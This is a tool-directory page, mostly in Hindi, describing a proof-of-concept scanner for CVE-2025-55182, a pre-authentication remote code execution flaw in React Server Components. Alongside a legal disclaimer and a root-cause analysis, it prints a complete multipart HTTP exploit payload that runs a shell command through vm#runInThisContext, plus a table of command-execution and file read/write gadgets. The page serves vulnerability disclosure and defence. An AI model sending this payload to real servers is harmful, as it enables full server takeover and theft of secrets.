Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-POC-SCANNER — एकीकृत सुरक्षा अनुसंधान उपकरण | Kitploit
उपकरण/GitHubGitHub/im-hanzou/cve-2025-55182-poc-scanner
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubim-hanzou/cve-2025-55182-poc-scanner

CVE-2025-55182-POC-SCANNER

एकीकृत सुरक्षा अनुसंधान उपकरण

2210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-55182: React सर्वर कंपोनेंट्स में क्रिटिकल प्री-ऑथेंटिकेशन RCE

CVE-2025-55182 CVSS 10.0 Affected React Versions Affected Next.js Versions

schema.cx द्वारा सुरक्षा अनुसंधान
"नियंत्रण एक भ्रम है। यह वे सिस्टम हैं जिन्हें हम बनाते हैं जो हमें नियंत्रित करते हैं—जब तक कि हम उन्हें पहले नहीं समझते।"


📋 विषय-सूची

  • अस्वीकरण और कानूनी सूचना
  • कार्यकारी सारांश
  • तकनीकी विवरण
  • प्रभावित सिस्टम
  • प्रूफ ऑफ कॉन्सेप्ट
  • प्रभाव आकलन
  • शमन और निवारण
  • जिम्मेदार प्रकटीकरण समयरेखा
  • संदर्भ
  • श्रेय

⚠️ अस्वीकरण और कानूनी सूचना

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है

रुकें। आगे बढ़ने से पहले इसे पढ़ें।

इस रिपॉजिटरी में एक क्रिटिकल सुरक्षा भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट कोड शामिल है। इस रिपॉजिटरी में किसी भी सामग्री तक पहुँच, डाउनलोड या उपयोग करके, आप निम्नलिखित को स्वीकार करते हैं और सहमत होते हैं:

कानूनी आवश्यकताएँ

  1. लिखित प्राधिकरण आवश्यक: किसी भी सुरक्षा परीक्षण से पहले आपके पास सिस्टम स्वामी से स्पष्ट, लिखित अनुमति होनी चाहिए। मौखिक समझौते पर्याप्त नहीं हैं।

  2. दायरे की सीमाएँ: परीक्षण केवल आपके प्राधिकरण में स्पष्ट रूप से सूचीबद्ध सिस्टम तक सीमित होना चाहिए। "स्कोप क्रीप" की अनुमति नहीं है।

  3. लागू कानून: कंप्यूटर सिस्टम तक अनधिकृत पहुँच निम्नलिखित का उल्लंघन करती है:

    • संयुक्त राज्य अमेरिका: कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA), 18 U.S.C. § 1030
    • यूरोपीय संघ: सूचना प्रणालियों पर हमलों से संबंधित निर्देश 2013/40/EU
    • यूनाइटेड किंगडम: कंप्यूटर मिसयूज़ एक्ट 1990
    • ऑस्ट्रेलिया: क्रिमिनल कोड एक्ट 1995, डिवीज़न 477-478
    • अन्य क्षेत्राधिकार: समान कंप्यूटर अपराध कानून विश्व स्तर पर लागू होते हैं

दायित्व अस्वीकरण

इस रिपॉजिटरी के लेखक और योगदानकर्ता:

  • इस टूल के दुरुपयोग के लिए कोई जिम्मेदारी स्वीकार नहीं करते हैं
  • कोई वारंटी, स्पष्ट या निहित, प्रदान नहीं करते हैं
  • इस सॉफ़्टवेयर के उपयोग या उपयोग करने में असमर्थता से उत्पन्न किसी भी क्षति के लिए उत्तरदायी नहीं हैं
  • किसी भी प्रकार की अवैध गतिविधियों का समर्थन नहीं करते हैं

नैतिक दिशानिर्देश

  • बिना अनुमति कभी परीक्षण न करें — भले ही आप "बस जाँच करना चाहते हों"
  • सब कुछ दस्तावेज़ित करें — सभी परीक्षण गतिविधियों के विस्तृत लॉग बनाए रखें
  • प्रभाव कम करें — यथासंभव कम आक्रामक तरीकों का उपयोग करें
  • जिम्मेदारी से रिपोर्ट करें — समन्वित प्रकटीकरण प्रथाओं का पालन करें
  • गोपनीयता का सम्मान करें — संवेदनशील डेटा को बाहर न निकालें या बनाए न रखें

"सवाल यह नहीं है कि क्या हम भेद्यता का शोषण कर सकते हैं। सवाल यह है कि क्या हमें करना चाहिए, और किस उद्देश्य के लिए।"


📊 कार्यकारी सारांश

CVE-2025-55182 एक क्रिटिकल प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है जो React 19.x और Next.js 15.x-16.x अनुप्रयोगों में React सर्वर कंपोनेंट्स को प्रभावित करती है।

व्यावसायिक प्रभाव

यह भेद्यता किसी भी अनप्रमाणित हमलावर को, जिसके पास भेद्य अनुप्रयोग तक नेटवर्क पहुँच है, सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है। हमले के लिए कोई क्रेडेंशियल, कोई उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं है, और इसे पूरी तरह से स्वचालित किया जा सकता है। सफल शोषण से निम्नलिखित होता है:

  • पूर्ण सर्वर समझौता — हमलावरों को अंतर्निहित सिस्टम पर पूर्ण नियंत्रण मिल जाता है
  • डेटा उल्लंघन की संभावना — डेटाबेस, एनवायरनमेंट वेरिएबल्स, सीक्रेट्स और उपयोगकर्ता डेटा तक पहुँच
  • लेटरल मूवमेंट — समझौता किए गए सर्वरों का उपयोग आंतरिक नेटवर्क पर हमला करने के लिए किया जा सकता है
  • सप्लाई चेन जोखिम — लाखों उपयोगकर्ताओं की सेवा करने वाले प्रोडक्शन सिस्टम प्रभावित हो सकते हैं

गंभीरता रेटिंग

मेट्रिकरेटिंग
CVSS v3.1 बेस स्कोर10.0 क्रिटिकल
अटैक वेक्टरनेटवर्क
अटैक जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता इंटरैक्शनकोई नहीं
प्रभाव (C/I/A)उच्च / उच्च / उच्च

"लोग सिस्टम पर भरोसा करते हैं क्योंकि वे उन्हें समझते नहीं हैं। वह भरोसा ही एक भेद्यता है।"


🔬 तकनीकी विवरण

मूल कारण विश्लेषण

यह भेद्यता requireModule फ़ंक्शन के भीतर React के Flight प्रोटोकॉल कार्यान्वयन में मौजूद है। यह फ़ंक्शन यह सत्यापित किए बिना कि अनुरोधित प्रॉपर्टी मॉड्यूल की अपनी प्रॉपर्टी है, उपयोगकर्ता-नियंत्रित इनपुट के आधार पर मॉड्यूल एक्सपोर्ट तक पहुँचने के लिए ब्रैकेट नोटेशन का उपयोग करता है।

भेद्य कोड स्थान:

react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Function: requireModule (approximately line 2546-2558 in v19.0.0)

भेद्य पैटर्न:

function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  // ... async handling ...
  return moduleExports[metadata[2]];  // ← VULNERABLE: No hasOwnProperty check
}

शोषण तंत्र

यह हमला JavaScript की प्रोटोटाइप चेन ट्रैवर्सल का लाभ उठाता है:

  1. प्रवेश बिंदु: हमलावर सर्वर एक्शन एंडपॉइंट पर एक दुर्भावनापूर्ण मल्टीपार्ट फॉर्म अनुरोध भेजता है
  2. पेलोड इंजेक्शन: $ACTION_0:0 फ़ील्ड में हमलावर-नियंत्रित id (module#export प्रारूप) और bound (तर्क) प्रॉपर्टी वाला JSON होता है
  3. प्रोटोटाइप एक्सेस: constructor जैसे एक्सपोर्ट निर्दिष्ट करके या प्रोटोटाइप प्रॉपर्टीज़ तक पहुँच कर, हमलावर अंतर्निहित Node.js मॉड्यूल्स का संदर्भ ले सकते हैं
  4. RCE गैजेट्स: vm.runInThisContext, child_process.execSync, या fs.readFileSync जैसे फ़ंक्शन हमलावर-आपूर्ति तर्कों के साथ निष्पादित होते हैं

हमला वेक्टर

HTTP POST /formaction
    ↓
decodeAction(formData, serverManifest)
    ↓
loadServerReference(manifest, value.id, value.bound)
    ↓
resolveServerReference(config, id)  // Parses "module#export" format
    ↓
requireModule(metadata)
    ↓
moduleExports[metadata[2]]  // Prototype chain access → RCE

पेलोड संरचना

POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--

उपलब्ध RCE गैजेट्स

गैजेटमॉड्यूलविवरणप्रभाव
vm#runInThisContextvmवर्तमान कॉन्टेक्स्ट में JS निष्पादित करेंप्रत्यक्ष RCE
vm#runInNewContextvmसैंडबॉक्स में JS निष्पादित करें (बचने योग्य)प्रत्यक्ष RCE
child_process#execSyncchild_processशेल कमांड निष्पादित करेंप्रत्यक्ष RCE
child_process#spawnSyncchild_processप्रोसेस स्पॉन करेंप्रत्यक्ष RCE
fs#readFileSyncfsमनमानी फ़ाइलें पढ़ेंडेटा एक्सफ़िल्ट्रेशन
fs#writeFileSyncfsमनमानी फ़ाइलें लिखेंपर्सिस्टेंस/बैकडोर
module#_loadmoduleJS मॉड्यूल लोड करें (2-चरणीय RCE)अप्रत्यक्ष RCE

"हर सिस्टम का एक दरवाज़ा होता है। सवाल यह है कि क्या आपने ताला खुद बनाया है—या इसे किसी ऐसे व्यक्ति से विरासत में पाया है जिसने कभी आगंतुकों की उम्मीद नहीं की थी।"


🎯 प्रभावित सिस्टम

भेद्य संस्करण

उत्पादभेद्य संस्करणपैच किए गए संस्करण
React19.0.0, 19.1.0, 19.1.1, 19.2.019.0.1+, 19.1.2+, 19.2.1+
Next.js15.x, 16.x (भेद्य React का उपयोग करते हुए)पैच किए गए React वाले संस्करण

शोषण के लिए पूर्वापेक्षाएँ

टूल डाउनलोड करें